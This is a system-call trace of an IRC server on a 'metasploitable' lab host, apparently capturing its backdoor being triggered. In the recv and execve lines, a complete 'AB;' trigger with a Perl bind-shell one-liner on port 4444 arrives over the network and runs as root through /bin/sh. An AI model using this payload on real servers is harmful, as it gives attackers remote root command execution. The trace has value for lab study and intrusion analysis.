4519  07:20:06.195027 select(1024, [2 3 4 7 9], [], NULL, {0, 740000}) = 1 (in [2], left {0, 550000})

4519  07:20:06.384802 clock_gettime(CLOCK_MONOTONIC, {1616, 201825231}) = 0

4519  07:20:06.384826 time(NULL)        = 1495624806

4519  07:20:06.384838 time(NULL)        = 1495624806

4519  07:20:06.384866 gettimeofday({1495624806, 384869}, NULL) = 0

4519  07:20:06.384878 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:20:06.384918 clock_gettime(CLOCK_MONOTONIC, {1616, 201931445}) = 0

4519  07:20:06.384929 gettimeofday({1495624806, 384932}, NULL) = 0

4519  07:20:06.384939 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:20:06.384979 clock_gettime(CLOCK_MONOTONIC, {1616, 201991481}) = 0

4519  07:20:06.384990 accept(2, 0, NULL) = 5

4519  07:20:06.385009 getpeername(5, {sa_family=AF_INET, sin_port=htons(35723), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:20:06.385040 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:06.385052 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:06.385065 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:20:06.385078 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:20:06.385089 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:20:06.385100 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:20:06.385115 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:20:06.385131 clock_gettime(CLOCK_MONOTONIC, {1616, 202144712}) = 0

4519  07:20:06.385143 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:20:06.385175 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:06.385185 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:06.385387 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:20:06.385398 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:20:06.385415 send(6, "\3621\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:20:06.385497 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:20:06.385535 gettimeofday({1495624806, 385539}, NULL) = 0

4519  07:20:06.385546 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:20:06.388761 clock_gettime(CLOCK_MONOTONIC, {1616, 205770204}) = 0

4519  07:20:06.388761 recvfrom(6, "\3621\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\241\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:20:06.388780 close(6)          = 0

4519  07:20:06.388796 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:20:06.388810 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:20:06.388869 time(NULL)        = 1495624806

4519  07:20:06.388882 time(NULL)        = 1495624806

4519  07:20:06.388909 gettimeofday({1495624806, 388913}, NULL) = 0

4519  07:20:06.388922 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:06.388953 clock_gettime(CLOCK_MONOTONIC, {1616, 205965953}) = 0

4519  07:20:06.388964 gettimeofday({1495624806, 388967}, NULL) = 0

4519  07:20:06.389036 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 660000})

4519  07:20:06.721675 clock_gettime(CLOCK_MONOTONIC, {1616, 538709257}) = 0

4519  07:20:06.721731 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:20:06.721782 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721822 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721845 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721867 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721887 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721920 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721941 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721961 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.721982 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722003 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722023 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722044 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722065 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722119 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722153 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722173 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722193 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722213 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722233 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722253 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722273 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722294 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:06.722319 gettimeofday({1495624806, 722325}, NULL) = 0

4519  07:20:06.722336 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:20:06.722397 clock_gettime(CLOCK_MONOTONIC, {1616, 539411888}) = 0

4519  07:20:06.722414 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:20:06.722456 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:20:06.722482 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:20:06.722500 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:20:06.722523 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7723

7723  07:20:06.722645 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7723  07:20:06.722667 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7723  07:20:06.722682 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7723  07:20:06.722701 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7723  07:20:06.722848 brk(0)            = 0x80f9000

7723  07:20:06.722876 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.722899 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efe000

7723  07:20:06.722923 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.722950 open("/etc/ld.so.cache", O_RDONLY) = 1

7723  07:20:06.722969 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7723  07:20:06.722997 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef6000

7723  07:20:06.723027 close(1)          = 0

7723  07:20:06.723045 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.723069 open("/lib/libncurses.so.5", O_RDONLY) = 1

7723  07:20:06.723102 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7723  07:20:06.723260 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7723  07:20:06.723285 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec6000

7723  07:20:06.723316 mmap2(0xb7ef3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7ef3000

7723  07:20:06.723342 close(1)          = 0

7723  07:20:06.723359 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.723380 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7723  07:20:06.723402 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7723  07:20:06.723553 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7723  07:20:06.723582 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec2000

7723  07:20:06.723601 mmap2(0xb7ec4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ec4000

7723  07:20:06.723626 close(1)          = 0

7723  07:20:06.723644 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.723665 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7723  07:20:06.723687 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7723  07:20:06.723833 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7723  07:20:06.723860 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec1000

7723  07:20:06.723881 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d72000

7723  07:20:06.723898 mmap2(0xb7ebb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ebb000

7723  07:20:06.723920 mmap2(0xb7ebe000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ebe000

7723  07:20:06.723938 close(1)          = 0

7723  07:20:06.723962 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d71000

7723  07:20:06.723975 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d716b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7723  07:20:06.724032 mprotect(0xb7ebb000, 4096, PROT_READ) = 0

7723  07:20:06.724104 munmap(0xb7ef6000, 29913) = 0

7723  07:20:06.724146 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.724160 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7723  07:20:06.724181 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9e43a0) = -1 ENOTTY (Inappropriate ioctl for device)

7723  07:20:06.724212 brk(0)            = 0x80f9000

7723  07:20:06.724222 brk(0x80fa000)    = 0x80fa000

7723  07:20:06.724235 brk(0x80fb000)    = 0x80fb000

7723  07:20:06.724251 getuid32()        = 0

7723  07:20:06.724260 getgid32()        = 0

7723  07:20:06.724270 geteuid32()       = 0

7723  07:20:06.724279 getegid32()       = 0

7723  07:20:06.724294 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.724311 time(NULL)        = 1495624806

7723  07:20:06.724323 brk(0x80fc000)    = 0x80fc000

7723  07:20:06.724338 brk(0x80fd000)    = 0x80fd000

7723  07:20:06.724358 open("/proc/meminfo", O_RDONLY) = 1

7723  07:20:06.724380 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7723  07:20:06.724399 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

7723  07:20:06.724411 read(1, "MemTotal:      1035240 kB\nMemFree:        544104 kB\nBuffers:         64964 kB\nCached:         269132 kB\nSwapCached:          0 kB\nActive:         254292 kB\nInactive:       208736 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        543864 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4632 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            16784 kB\nSReclaimable:     8572 kB\nSUnreclaim:       8212 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7723  07:20:06.724496 close(1)          = 0

7723  07:20:06.724507 munmap(0xb7efd000, 4096) = 0

7723  07:20:06.724519 brk(0x80fe000)    = 0x80fe000

7723  07:20:06.724589 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7723  07:20:06.724604 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7723  07:20:06.724617 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7723  07:20:06.724643 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7723  07:20:06.724656 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7723  07:20:06.724668 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7723  07:20:06.724681 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7723  07:20:06.724693 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7723  07:20:06.724707 uname({sys="Linux", node="metasploitable", ...}) = 0

7723  07:20:06.724761 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7723  07:20:06.724779 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7723  07:20:06.724798 brk(0x8100000)    = 0x8100000

7723  07:20:06.724811 getcwd("/etc/unreal", 4096) = 12

7723  07:20:06.724826 getpid()          = 7723

7723  07:20:06.724843 getppid()         = 4519

7723  07:20:06.724859 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7723  07:20:06.724880 stat64("/sbin/sh", 0xbf9e4378) = -1 ENOENT (No such file or directory)

7723  07:20:06.724893 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7723  07:20:06.724911 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7723  07:20:06.724956 socket(PF_FILE, SOCK_STREAM, 0) = 1

7723  07:20:06.724970 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7723  07:20:06.724997 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7723  07:20:06.725053 close(1)          = 0

7723  07:20:06.725069 socket(PF_FILE, SOCK_STREAM, 0) = 1

7723  07:20:06.725080 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7723  07:20:06.725104 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7723  07:20:06.725125 close(1)          = 0

7723  07:20:06.725142 open("/etc/nsswitch.conf", O_RDONLY) = 1

7723  07:20:06.725157 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7723  07:20:06.725174 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

7723  07:20:06.725207 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7723  07:20:06.725276 read(1, "", 4096) = 0

7723  07:20:06.725287 close(1)          = 0

7723  07:20:06.725297 munmap(0xb7efd000, 4096) = 0

7723  07:20:06.725317 open("/etc/ld.so.cache", O_RDONLY) = 1

7723  07:20:06.725331 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7723  07:20:06.725370 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef6000

7723  07:20:06.725382 close(1)          = 0

7723  07:20:06.725394 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.725410 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7723  07:20:06.725427 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7723  07:20:06.725592 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7723  07:20:06.725620 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d68000

7723  07:20:06.725637 mmap2(0xb7d6f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d6f000

7723  07:20:06.725669 close(1)          = 0

7723  07:20:06.725687 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7723  07:20:06.725707 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7723  07:20:06.725727 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7723  07:20:06.725858 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

